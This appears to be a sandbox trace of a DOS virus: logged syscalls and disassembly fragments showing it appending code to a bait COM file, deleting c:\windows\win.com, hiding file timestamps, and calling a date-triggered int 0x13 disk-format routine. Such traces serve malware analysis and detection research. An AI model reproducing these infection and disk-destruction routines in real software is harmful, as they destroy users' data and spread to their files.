2018-12-25T12:22:18.905787944Z 26 PC: 148b7 | Set disk transfer address
2018-12-25T12:22:18.907648301Z 59 PC: 148bf | Change current directory
2018-12-25T12:22:18.912245856Z 26 PC: 145e2 | Set disk transfer address
2018-12-25T12:22:18.913543551Z 71 PC: 14682 | Get current directory
2018-12-25T12:22:18.917286937Z 78 PC: 145f1 | Find first file
2018-12-25T12:22:18.92373984Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.936161667Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:22:18.943551273Z 66 PC: 14630 | Move file pointer
2018-12-25T12:22:18.94494697Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:22:18.948156466Z 66 PC: 14648 | Move file pointer
2018-12-25T12:22:18.95073852Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-25T12:22:19.021701184Z 62 PC: 14659 | Close file
2018-12-25T12:22:19.036645581Z 59 PC: 14661 | Change current directory
2018-12-25T12:22:19.041792606Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-25T12:22:19.39583342Z 59 PC: 1466e | Change current directory
2018-12-25T12:22:19.399323919Z 26 PC: 14677 | Set disk transfer address
2018-12-25T12:22:19.401251859Z 71 PC: 1441e | Get current directory
2018-12-25T12:22:19.408572599Z 26 PC: 1443d | Set disk transfer address
2018-12-25T12:22:19.410819171Z 78 PC: 14447 | Find first file
2018-12-25T12:22:19.418816736Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.429463871Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.437366396Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.445325426Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.449687352Z 66 PC: 1448b | Move file pointer
2018-12-25T12:22:19.451532615Z 44 PC: 14491 | Get time 0x14491: inc dl
0x14493: mov byte ptr [bp + 0x2d9], dl
0x14497: pushaw
0x14498: call 0x243f2
0x1449b: popaw
0x1449c: mov byte ptr [bp + 0x330], 0xe9
0x144a1: mov ax, word ptr [bp + 0x34e]
0x144a5: sub ax, 3
0x144a8: mov word ptr [bp + 0x331], ax
0x144ac: mov word ptr [bp + 0x333], 0x60
0x144b2: mov ah, 0x40
0x144b4: mov cx, 4
0x144b7: lea dx, word ptr [bp + 0x330]
0x144bb: int 0x21
0x144bd: mov ax, 0x4202
0x144c0: xor cx, cx
0x144c2: xor dx, dx
0x144c4: int 0x21
0x144c6: mov ah, 0x40
0x144c8: mov cx, 0x1d6
2018-12-25T12:22:19.45458888Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.458522147Z 66 PC: 144c6 | Move file pointer
2018-12-25T12:22:19.460345112Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:22:19.655754789Z 42 PC: 144da | Get date 0x144da: cmp dx, 0x71a
0x144de: je 0x1453f
0x144e0: cmp dx, 0xc06
0x144e4: je 0x1453f
0x144e6: lea dx, word ptr [bp + 0x29f]
0x144ea: mov ah, 0x3b
0x144ec: int 0x21
0x144ee: jb 0x144f3
0x144f0: jmp 0x1443d
0x144f3: mov ax, 0x5701
0x144f6: mov dx, word ptr [bp + 0x326]
0x144fa: mov cx, word ptr [bp + 0x324]
0x144fe: int 0x21
0x14500: mov ah, 0x3e
0x14502: int 0x21
0x14504: mov ax, 0x4301
0x14507: lea dx, word ptr [bp + 0x352]
0x1450b: xor ch, ch
0x1450d: mov cl, byte ptr [bp + 0x323]
0x14511: int 0x21
2018-12-25T12:22:19.65908923Z 64 PC: 1454f | Write file or device (Write 44 bytes on handle 1)
2018-12-25T12:22:19.664144125Z 87 PC: 14500 | Get or set file date and time
2018-12-25T12:22:19.668262406Z 62 PC: 14504 | Close file
2018-12-25T12:22:19.766348006Z 67 PC: 14513 | Get or set file attributes
2018-12-25T12:22:19.776126448Z 59 PC: 1451b | Change current directory
2018-12-25T12:22:19.780757284Z 26 PC: 14527 | Set disk transfer address
2018-12-25T12:22:19.78271306Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:22:19.785294532Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:22:19.786680627Z 26 PC: 14274 | Set disk transfer address
2018-12-25T12:22:19.78797925Z 71 PC: 14281 | Get current directory
2018-12-25T12:22:19.791700683Z 42 PC: 14286 | Get date 0x14286: cmp dl, 6
0x14289: jne 0x142ad
0x1428b: mov ax, 0x500
0x1428e: mov cx, 0
0x14291: mov dh, 0
0x14293: mov dl, 0x80
0x14295: int 0x13
0x14297: jb 0x1425a
0x14299: mov ah, 9
0x1429b: lea dx, word ptr [si + 0x27d]
0x1429f: int 0x21
0x142a1: nop
0x142a2: jmp 0x142a1
0x142a4: mov cx, 0x4eb
0x142a7: jmp 0x142a5
0x142a9: cli
0x142aa: jmp 0x142a0
0x142ac: iret
0x142ad: lea dx, word ptr [si + 0x25c]
0x142b1: xor cx, cx
2018-12-25T12:22:19.794934128Z 62 PC: 1434c | Close file
2018-12-25T12:22:19.798215031Z 59 PC: 14354 | Change current directory
2018-12-25T12:22:19.800878568Z 26 PC: 1435b | Set disk transfer address
2018-12-25T12:22:19.802226596Z 48 PC: 1404a | Get DOS version
2018-12-25T12:22:19.803487319Z 47 PC: 14056 | Get disk transfer address
2018-12-25T12:22:19.805226452Z 26 PC: 14063 | Set disk transfer address
2018-12-25T12:22:19.806422361Z 78 PC: 140d6 | Find first file
2018-12-25T12:22:19.813286262Z 67 PC: 1411a | Get or set file attributes
2018-12-25T12:22:19.820193709Z 67 PC: 14128 | Get or set file attributes
2018-12-25T12:22:20.138635339Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.15325462Z 87 PC: 1413c | Get or set file date and time
2018-12-25T12:22:20.158527332Z 44 PC: 14146 | Get time 0x14146: mov ah, 0x3f
0x14148: mov cx, 3
0x1414b: lea dx, word ptr [si + 0x13]
0x1414e: int 0x21
0x14150: jb 0x14199
0x14152: cmp ax, 3
0x14155: jne 0x14199
0x14157: mov ax, 0x4202
0x1415a: xor cx, cx
0x1415c: xor dx, dx
0x1415e: int 0x21
0x14160: jb 0x14199
0x14162: mov cx, ax
0x14164: sub ax, 3
0x14167: mov word ptr [si + 0x17], ax
0x1416a: add cx, 0x2bd
0x1416e: mov word ptr [si - 0x1bc], cx
0x14172: mov ah, 0x40
0x14174: mov cx, 0x1e1
0x14177: nop
2018-12-25T12:22:20.164130573Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.176139015Z 66 PC: 14160 | Move file pointer
2018-12-25T12:22:20.178769498Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.190657899Z 66 PC: 1418d | Move file pointer
2018-12-25T12:22:20.19232679Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-25T12:22:20.197589945Z 87 PC: 141aa | Get or set file date and time
2018-12-25T12:22:20.200350551Z 62 PC: 141ae | Close file
2018-12-25T12:22:20.209677148Z 67 PC: 141b9 | Get or set file attributes
2018-12-25T12:22:20.222715526Z 26 PC: 141c4 | Set disk transfer address
2018-12-25T12:22:20.225400687Z 26 PC: 13e67 | Set disk transfer address
2018-12-25T12:22:20.226727342Z 78 PC: 13ea5 | Find first file
2018-12-25T12:22:20.234594517Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.243134599Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-25T12:22:20.246777694Z 66 PC: 13ed9 | Move file pointer
2018-12-25T12:22:20.248410047Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.252920217Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.264240524Z 66 PC: 13f02 | Move file pointer
2018-12-25T12:22:20.265922784Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.269982211Z 62 PC: 13e99 | Close file
2018-12-25T12:22:20.279891963Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.283301673Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.29130881Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.299035383Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.301442798Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.305075033Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.309245082Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.310856247Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.313958752Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.325258425Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.328660022Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.336181746Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.344811134Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.3469937Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.350374042Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.360184852Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.361965366Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.369800236Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.379608732Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.382515849Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.386848837Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.395549891Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.397674382Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.402127119Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.412525479Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.414993954Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.424323733Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.435806719Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.439078514Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.446781211Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.455028927Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.456660914Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.459720637Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.471985758Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.473807437Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.481478904Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.491721026Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.49519432Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.502791899Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.511716802Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.514146987Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.51758242Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.528383957Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.530577692Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.538352393Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.548722053Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.552695513Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.560496034Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.568409401Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.570633756Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.574086545Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.583637185Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.586376726Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.594104993Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.604331389Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.608833875Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.616600368Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.622159782Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.624550523Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.630772388Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.636989343Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.639907751Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.642903825Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.651543839Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.655862564Z 26 PC: 13e7b | Set disk transfer address
2018-12-25T12:22:20.657540576Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:22:20.665554228Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9008,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:19.165685123Z 26 PC: 147b3 | Set disk transfer address
2018-12-25T12:22:19.16824212Z 250 PC: 147bb | UNKNOWN!
2018-12-25T12:22:19.169096467Z 71 PC: 147c6 | Get current directory
2018-12-25T12:22:19.172618618Z 25 PC: 147ca | Get default drive
2018-12-25T12:22:19.174271755Z 78 PC: 147e2 | Find first file
2018-12-25T12:22:19.180840358Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.18818533Z 66 PC: 14803 | Move file pointer
2018-12-25T12:22:19.190140561Z 62 PC: 148d3 | Close file
2018-12-25T12:22:19.192028927Z 79 PC: 148db | Find next file
2018-12-25T12:22:19.19489064Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.20244103Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.204697235Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.206535829Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.209222604Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.216853561Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.218652201Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.220574352Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.223671149Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.230535576Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.231922573Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.234694Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.238675772Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.252879027Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.255017244Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.257120248Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.259884177Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.267391995Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.269091039Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.271063933Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.274839024Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.282123737Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.283665811Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.285585757Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.288327666Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.295469303Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.296979822Z 66 PC: 14824 | Move file pointer
2018-12-25T12:22:19.299047355Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.301719727Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.303628397Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.306542593Z 59 PC: 148f7 | Change current directory
2018-12-25T12:22:19.312165356Z 62 PC: 148b0 | Close file
2018-12-25T12:22:19.313454883Z 26 PC: 148b7 | Set disk transfer address
2018-12-25T12:22:19.314831555Z 59 PC: 148bf | Change current directory
2018-12-25T12:22:19.319142262Z 26 PC: 145e2 | Set disk transfer address
2018-12-25T12:22:19.320091394Z 71 PC: 14682 | Get current directory
2018-12-25T12:22:19.323540245Z 78 PC: 145f1 | Find first file
2018-12-25T12:22:19.329724487Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.336731727Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:22:19.343835867Z 66 PC: 14630 | Move file pointer
2018-12-25T12:22:19.345276278Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:22:19.348032527Z 66 PC: 14648 | Move file pointer
2018-12-25T12:22:19.349822198Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-25T12:22:19.394825406Z 62 PC: 14659 | Close file
2018-12-25T12:22:19.407106427Z 59 PC: 14661 | Change current directory
2018-12-25T12:22:19.413209829Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-25T12:22:19.766463983Z 59 PC: 1466e | Change current directory
2018-12-25T12:22:19.769113096Z 26 PC: 14677 | Set disk transfer address
2018-12-25T12:22:19.771177374Z 71 PC: 1441e | Get current directory
2018-12-25T12:22:19.7758918Z 26 PC: 1443d | Set disk transfer address
2018-12-25T12:22:19.780079906Z 78 PC: 14447 | Find first file
2018-12-25T12:22:19.787374704Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.797688203Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.805855122Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.816866189Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.821186822Z 66 PC: 1448b | Move file pointer
2018-12-25T12:22:19.823502058Z 44 PC: 14491 | Get time 0x14491: inc dl
0x14493: mov byte ptr [bp + 0x2d9], dl
0x14497: pushaw
0x14498: call 0x243f2
0x1449b: popaw
0x1449c: mov byte ptr [bp + 0x330], 0xe9
0x144a1: mov ax, word ptr [bp + 0x34e]
0x144a5: sub ax, 3
0x144a8: mov word ptr [bp + 0x331], ax
0x144ac: mov word ptr [bp + 0x333], 0x60
0x144b2: mov ah, 0x40
0x144b4: mov cx, 4
0x144b7: lea dx, word ptr [bp + 0x330]
0x144bb: int 0x21
0x144bd: mov ax, 0x4202
0x144c0: xor cx, cx
0x144c2: xor dx, dx
0x144c4: int 0x21
0x144c6: mov ah, 0x40
0x144c8: mov cx, 0x1d6
2018-12-25T12:22:19.826513993Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.830737566Z 66 PC: 144c6 | Move file pointer
2018-12-25T12:22:19.833084311Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:22:20.138892715Z 42 PC: 144da | Get date 0x144da: cmp dx, 0x71a
0x144de: je 0x1453f
0x144e0: cmp dx, 0xc06
0x144e4: je 0x1453f
0x144e6: lea dx, word ptr [bp + 0x29f]
0x144ea: mov ah, 0x3b
0x144ec: int 0x21
0x144ee: jb 0x144f3
0x144f0: jmp 0x1443d
0x144f3: mov ax, 0x5701
0x144f6: mov dx, word ptr [bp + 0x326]
0x144fa: mov cx, word ptr [bp + 0x324]
0x144fe: int 0x21
0x14500: mov ah, 0x3e
0x14502: int 0x21
0x14504: mov ax, 0x4301
0x14507: lea dx, word ptr [bp + 0x352]
0x1450b: xor ch, ch
0x1450d: mov cl, byte ptr [bp + 0x323]
0x14511: int 0x21
2018-12-25T12:22:20.142467243Z 59 PC: 144ee | Change current directory
2018-12-25T12:22:20.148239786Z 87 PC: 14500 | Get or set file date and time
2018-12-25T12:22:20.149546456Z 62 PC: 14504 | Close file
2018-12-25T12:22:20.156444017Z 67 PC: 14513 | Get or set file attributes
2018-12-25T12:22:20.165718364Z 59 PC: 1451b | Change current directory
2018-12-25T12:22:20.168582707Z 26 PC: 14527 | Set disk transfer address
2018-12-25T12:22:20.169816391Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:22:20.172160939Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:22:20.173591444Z 26 PC: 14274 | Set disk transfer address
2018-12-25T12:22:20.174717584Z 71 PC: 14281 | Get current directory
2018-12-25T12:22:20.177804519Z 42 PC: 14286 | Get date 0x14286: cmp dl, 6
0x14289: jne 0x142ad
0x1428b: mov ax, 0x500
0x1428e: mov cx, 0
0x14291: mov dh, 0
0x14293: mov dl, 0x80
0x14295: int 0x13
0x14297: jb 0x1425a
0x14299: mov ah, 9
0x1429b: lea dx, word ptr [si + 0x27d]
0x1429f: int 0x21
0x142a1: nop
0x142a2: jmp 0x142a1
0x142a4: mov cx, 0x4eb
0x142a7: jmp 0x142a5
0x142a9: cli
0x142aa: jmp 0x142a0
0x142ac: iret
0x142ad: lea dx, word ptr [si + 0x25c]
0x142b1: xor cx, cx
2018-12-25T12:22:20.179731634Z 78 PC: 142b7 | Find first file
2018-12-25T12:22:20.187588946Z 61 PC: 142c2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.192741678Z 63 PC: 142d1 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.198329185Z 87 PC: 142ec | Get or set file date and time
2018-12-25T12:22:20.199715008Z 66 PC: 142fc | Move file pointer
2018-12-25T12:22:20.201036485Z 63 PC: 14305 | Read file or device (Read 2 bytes on handle 6)
2018-12-25T12:22:20.206808715Z 44 PC: 1430f | Get time 0x1430f: or dx, dx
0x14311: je 0x1430b
0x14313: mov word ptr [si + 0x2df], dx
0x14317: xor dx, dx
0x14319: xor cx, cx
0x1431b: mov ax, 0x4202
0x1431e: int 0x21
0x14320: or dx, dx
0x14322: jne 0x142d6
0x14324: cmp ah, 0xfe
0x14327: jae 0x142d6
0x14329: call 0x24240
0x1432c: mov ax, 0x4200
0x1432f: xor cx, cx
0x14331: mov dx, 1
0x14334: int 0x21
0x14336: mov ah, 0x40
0x14338: lea dx, word ptr [si + 0x2e4]
0x1433c: mov cx, 2
0x1433f: int 0x21
2018-12-25T12:22:20.208975113Z 66 PC: 14320 | Move file pointer
2018-12-25T12:22:20.21034634Z 64 PC: 14252 | Write file or device (Write 476 bytes on handle 6)
2018-12-25T12:22:20.217329767Z 66 PC: 14336 | Move file pointer
2018-12-25T12:22:20.218557334Z 64 PC: 14341 | Write file or device (Write 2 bytes on handle 6)
2018-12-25T12:22:20.220764568Z 87 PC: 14348 | Get or set file date and time
2018-12-25T12:22:20.222801228Z 62 PC: 1434c | Close file
2018-12-25T12:22:20.22865651Z 59 PC: 14354 | Change current directory
2018-12-25T12:22:20.230238614Z 26 PC: 1435b | Set disk transfer address
2018-12-25T12:22:20.231930447Z 48 PC: 1404a | Get DOS version
2018-12-25T12:22:20.233075575Z 47 PC: 14056 | Get disk transfer address
2018-12-25T12:22:20.234346132Z 26 PC: 14063 | Set disk transfer address
2018-12-25T12:22:20.23571086Z 78 PC: 140d6 | Find first file
2018-12-25T12:22:20.241240975Z 67 PC: 1411a | Get or set file attributes
2018-12-25T12:22:20.245103062Z 67 PC: 14128 | Get or set file attributes
2018-12-25T12:22:20.254403062Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.260604116Z 87 PC: 1413c | Get or set file date and time
2018-12-25T12:22:20.262095147Z 44 PC: 14146 | Get time 0x14146: mov ah, 0x3f
0x14148: mov cx, 3
0x1414b: lea dx, word ptr [si + 0x13]
0x1414e: int 0x21
0x14150: jb 0x14199
0x14152: cmp ax, 3
0x14155: jne 0x14199
0x14157: mov ax, 0x4202
0x1415a: xor cx, cx
0x1415c: xor dx, dx
0x1415e: int 0x21
0x14160: jb 0x14199
0x14162: mov cx, ax
0x14164: sub ax, 3
0x14167: mov word ptr [si + 0x17], ax
0x1416a: add cx, 0x2bd
0x1416e: mov word ptr [si - 0x1bc], cx
0x14172: mov ah, 0x40
0x14174: mov cx, 0x1e1
0x14177: nop
2018-12-25T12:22:20.264403109Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.271268873Z 66 PC: 14160 | Move file pointer
2018-12-25T12:22:20.272851507Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.279081161Z 66 PC: 1418d | Move file pointer
2018-12-25T12:22:20.281064319Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-25T12:22:20.283177114Z 87 PC: 141aa | Get or set file date and time
2018-12-25T12:22:20.28472278Z 62 PC: 141ae | Close file
2018-12-25T12:22:20.290678796Z 67 PC: 141b9 | Get or set file attributes
2018-12-25T12:22:20.297519399Z 26 PC: 141c4 | Set disk transfer address
2018-12-25T12:22:20.298634033Z 26 PC: 13e67 | Set disk transfer address
2018-12-25T12:22:20.300091201Z 78 PC: 13ea5 | Find first file
2018-12-25T12:22:20.304254822Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.312279419Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-25T12:22:20.317238757Z 66 PC: 13ed9 | Move file pointer
2018-12-25T12:22:20.318423423Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.323482749Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.329422603Z 66 PC: 13f02 | Move file pointer
2018-12-25T12:22:20.331446593Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.333487404Z 62 PC: 13e99 | Close file
2018-12-25T12:22:20.339922763Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.343917682Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.356655498Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.368554388Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.376256825Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.380920832Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.383407257Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.385422118Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.388517706Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.394606437Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.398687471Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.40358534Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.408599411Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.4106925Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.413405701Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.419916425Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.421903195Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.427243823Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.433598358Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.436857001Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.44297933Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.449268932Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.451343629Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.453511829Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.460892564Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.464123103Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.47288809Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.483466236Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.488965396Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.497357682Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.505700443Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.508905603Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.512468852Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.522911631Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.526431308Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.533976786Z 62 PC: 13e99 | Close file (See above)
